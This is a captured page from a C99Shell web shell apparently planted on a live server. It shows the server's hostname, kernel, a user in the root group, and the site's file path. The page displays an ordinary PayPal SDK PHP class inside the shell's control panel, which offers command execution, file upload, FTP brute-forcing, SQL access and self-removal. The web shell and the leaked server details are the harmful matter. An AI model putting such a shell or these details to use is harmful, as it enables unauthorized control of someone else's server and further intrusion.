!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.61 GB of 117.98 GB (24.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AgreementTransactions.php (1.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

use 
PayPal\Common\PayPalModel;

/**
 * Class AgreementTransactions
 *
 * A resource representing agreement_transactions that is returned during a transaction search.
 *
 * @package PayPal\Api
 *
 * @property \PayPal\Api\AgreementTransaction[] agreement_transaction_list
 */
class AgreementTransactions extends PayPalModel
{
    
/**
     * Array of agreement_transaction object.
     *
     * @param \PayPal\Api\AgreementTransaction[] $agreement_transaction_list
     * 
     * @return $this
     */
    
public function setAgreementTransactionList($agreement_transaction_list)
    {
        
$this->agreement_transaction_list $agreement_transaction_list;
        return 
$this;
    }

    
/**
     * Array of agreement_transaction object.
     *
     * @return \PayPal\Api\AgreementTransaction[]
     */
    
public function getAgreementTransactionList()
    {
        return 
$this->agreement_transaction_list;
    }

    
/**
     * Append AgreementTransactionList to the list.
     *
     * @param \PayPal\Api\AgreementTransaction $agreementTransaction
     * @return $this
     */
    
public function addAgreementTransactionList($agreementTransaction)
    {
        if (!
$this->getAgreementTransactionList()) {
            return 
$this->setAgreementTransactionList(array($agreementTransaction));
        } else {
            return 
$this->setAgreementTransactionList(
                
array_merge($this->getAgreementTransactionList(), array($agreementTransaction))
            );
        }
    }

    
/**
     * Remove AgreementTransactionList from the list.
     *
     * @param \PayPal\Api\AgreementTransaction $agreementTransaction
     * @return $this
     */
    
public function removeAgreementTransactionList($agreementTransaction)
    {
        return 
$this->setAgreementTransactionList(
            
array_diff($this->getAgreementTransactionList(), array($agreementTransaction))
        );
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--